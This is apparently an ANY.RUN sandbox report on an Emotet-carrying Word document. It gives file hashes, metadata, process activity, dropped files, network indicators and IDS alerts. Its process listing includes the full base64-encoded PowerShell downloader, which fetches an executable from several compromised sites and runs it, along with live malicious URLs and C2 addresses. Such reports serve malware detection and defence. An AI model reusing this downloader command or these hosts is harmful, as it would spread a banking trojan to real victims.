analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9654.doc

Full analysis: https://app.any.run/tasks/026db446-34d6-42da-92a6-06b9640ea4e2
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 06:45:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Down-sized, Subject: Berkshire, Author: Ryleigh Rodriguez, Comments: Operations Cambridgeshire, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:22:00 2019, Last Saved Time/Date: Wed Sep 18 07:22:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

B09B8BA8AE622BCF40D06572C62E65E1

SHA1:

8EF15BFD1C8C0E54F63BE39647C2072AC7B16E79

SHA256:

4DCFDBD73EC71EB47BEC2B47B6805862B7B293ABC8164B2F026D28E5F9FAA84F

SSDEEP:

6144:mvqZiq86MofT1K82zw1qWaWPLkIp7NSU4jJntATfDDAvLipwwPCQ3cq7:mvqZiq86MofT1K82zw1qWaEXp7NSU4VO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 373.exe (PID: 2164)
      • 373.exe (PID: 2668)
      • 373.exe (PID: 4016)
      • 373.exe (PID: 2940)
      • easywindow.exe (PID: 1372)
      • easywindow.exe (PID: 3160)
      • easywindow.exe (PID: 2076)
      • easywindow.exe (PID: 3216)
    • Emotet process was detected

      • 373.exe (PID: 2940)
    • Connects to CnC server

      • easywindow.exe (PID: 2076)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 2076)
    • EMOTET was detected

      • easywindow.exe (PID: 2076)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2472)
    • Creates files in the user directory

      • powershell.exe (PID: 2472)
    • Executed via WMI

      • powershell.exe (PID: 2472)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2472)
      • 373.exe (PID: 2940)
    • Application launched itself

      • 373.exe (PID: 2164)
      • easywindow.exe (PID: 3160)
    • Starts itself from another location

      • 373.exe (PID: 2940)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3408)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3408)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Down-sized
Subject: Berkshire
Author: Ryleigh Rodriguez
Keywords: -
Comments: Operations Cambridgeshire
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 06:22:00
ModifyDate: 2019:09:18 06:22:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Huel, Nienow and Stehr
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Reilly
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
7
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 373.exe no specs 373.exe no specs 373.exe no specs #EMOTET 373.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3408"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9654.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2472powershell -encod JAB6AHoATAA5AHMAYwA3AFUAPQAnAG0AVwBiAEoATwA0ACcAOwAkAEMAbgAwAFAAcgB0ACAAPQAgACcAMwA3ADMAJwA7ACQAcwBLAHEAdwA0AHUAPQAnAEIAcwBJAGIAagBqAFMAdQAnADsAJABJAEMAMABmAFEAdgBGADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAbgAwAFAAcgB0ACsAJwAuAGUAeABlACcAOwAkAEsAVgBoAGsAOABaAEIASgA9ACcAdQBaAEcANAA1AG8AMwAnADsAJAB3AG8AaQAzAFMAdQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAQgBjAGwAaQBFAG4AdAA7ACQAQwBXAGIAYQAzAHcARABzAD0AJwBoAHQAdABwADoALwAvAGQAaQByAHAAcgBvAHAAZQByAHQAaQBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBmAGQAMQA0ADkAOQA5AC8AQABoAHQAdABwADoALwAvAHIAdQBuAC0AZwBlAHIAbQBhAG4AeQAuAGMAbwBtAC8AcwBjAHIAaQBwAHQAcwAvAGoAYwA4ADIAOAAyADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBzAGEAeAB0AG8AcgBwAGgALgBuAGUAdAAvAEQATwBDAC8ANQBuAGQAcQBvAHYAMAAxADgALwBAAGgAdAB0AHAAcwA6AC8ALwBzAHUAawBoAHUAbQB2AGkAdABoAG8AbQBlAHMALgBjAG8AbQAvAHMAYQB0AGgAbwByAG4AYwBvAG4AZABvAHMALgBjAG8AbQAvAHUAYwB3AG4AYQA3ADkANAAvAEAAaAB0AHQAcAA6AC8ALwB2AGEAbgBzAGMAaABlAGUAcgBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZwBvAHIAcAA3AHYANAA1ADUAMwA3ADAALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAJwBAACcAKQA7ACQAQwBUAE4ARAB0ADUAPQAnAGoATgB3AEoAYQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABqAFgASQBPAFIASAB0ACAAaQBuACAAJABDAFcAYgBhADMAdwBEAHMAKQB7AHQAcgB5AHsAJAB3AG8AaQAzAFMAdQAuACIAZABPAHcAYABOAGAATABvAGAAQQBkAGYASQBsAEUAIgAoACQAagBYAEkATwBSAEgAdAAsACAAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAWABoAFIATwBRAHYAPQAnAEEAMQBuAGwAUABpADMAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAQwAwAGYAUQB2AEYANQApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMgA1ADgAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAVAAiACgAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAUwBfAFIAegByAFQAPQAnAHcASwBpAGkAYQA1AHQAJwA7AGIAcgBlAGEAawA7ACQAaQBhAEQAUwBrAGIAPQAnAE4AQgAwAEUAVwBHAGoAQQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAEwAdABrADcARgBXAHcAPQAnAFIATQBzAGgARwB2AEcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2668"C:\Users\admin\373.exe" C:\Users\admin\373.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4016"C:\Users\admin\373.exe" C:\Users\admin\373.exe373.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2164--92e680edC:\Users\admin\373.exe373.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2940--92e680edC:\Users\admin\373.exe
373.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1372"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe373.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3160"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3216--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2076--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 866
Read events
1 372
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3408WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C35.tmp.cvr
MD5:
SHA256:
3408WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2413F81C.wmfwmf
MD5:79DB283DB33FDCE169F29BFC3BD08FFC
SHA256:2C48729F5EF3EE53DA87F0256CE4988C897F61B95FF186DBA8384F6900A5A6F0
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\824734C7.wmfwmf
MD5:1A2C5846FDBB3EE8145258C4AAC904E0
SHA256:688EE3468FA0EA5A5729F36669A1DBFCCE62DE84BCF0492B565061A1764E917E
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFBC35D0.wmfwmf
MD5:25FF0D5DD8CE7C4F315B7210439F189B
SHA256:BFEC0A5D1AA9F81C9977BC1DC7614383DB679A6413EF2907DBA59B5441B8347E
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A574904B.wmfwmf
MD5:D84A9E5F78169F6CF0708A082E9A19CB
SHA256:0ED9A8399FE85F276E5562C10EE921C0D1FFB8FD3A10985CDD798BC892C53F03
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BC9865.wmfwmf
MD5:211231D9ACCB3E54BBCE1B307C5BE86C
SHA256:ED0499E6F8441DE9B2CA5AA8742681A606C175BC679360ED73B7C9681BE5D288
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B4F9B91.wmfwmf
MD5:51EA3C4ACA7F04B3DB6CF71A1E84388F
SHA256:8FE120AC905129B55F0F00CE4E0EEE5A874B8F160AAF3089207C08E9E2C26D3F
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\982176FF.wmfwmf
MD5:0DB7BC05A891308916393A768AD1A4B5
SHA256:F6C2C4E14D84F8BD2A36E771282CBADC31E03C883F5B551058DEF9AF6CC44930
3408WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49AC16D.wmfwmf
MD5:2358A6A797A89AE7DDF06D7950D0031E
SHA256:3D2BAB6974D823DEC4F9358EA2A905598072D21CD50C71B0AAEA3E609B4E0ED7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2472
powershell.exe
GET
406
93.191.156.116:80
http://saxtorph.net/DOC/5ndqov018/
DK
html
221 b
suspicious
2472
powershell.exe
GET
302
173.254.28.118:80
http://dirproperties.com/cgi-bin/fd14999/
US
html
301 b
suspicious
2076
easywindow.exe
POST
200
114.79.134.129:443
http://114.79.134.129:443/cab/
IN
binary
132 b
malicious
2472
powershell.exe
GET
200
81.169.145.69:80
http://run-germany.com/scripts/jc828208/
DE
html
4.56 Kb
malicious
2472
powershell.exe
GET
200
173.254.28.118:80
http://dirproperties.com/cgi-sys/suspendedpage.cgi
US
html
7.41 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2472
powershell.exe
81.169.145.69:80
run-germany.com
Strato AG
DE
malicious
2472
powershell.exe
173.254.28.118:80
dirproperties.com
Unified Layer
US
suspicious
2472
powershell.exe
93.191.156.116:80
saxtorph.net
Zitcom A/S
DK
suspicious
2472
powershell.exe
45.120.148.57:443
sukhumvithomes.com
A2 Hosting, Inc.
SG
suspicious
2076
easywindow.exe
114.79.134.129:443
D-Vois Broadband Pvt Ltd
IN
malicious

DNS requests

Domain
IP
Reputation
dirproperties.com
  • 173.254.28.118
suspicious
run-germany.com
  • 81.169.145.69
malicious
saxtorph.net
  • 93.191.156.116
suspicious
sukhumvithomes.com
  • 45.120.148.57
suspicious

Threats

PID
Process
Class
Message
2076
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2076
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2076
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
1 ETPRO signatures available at the full report
No debug info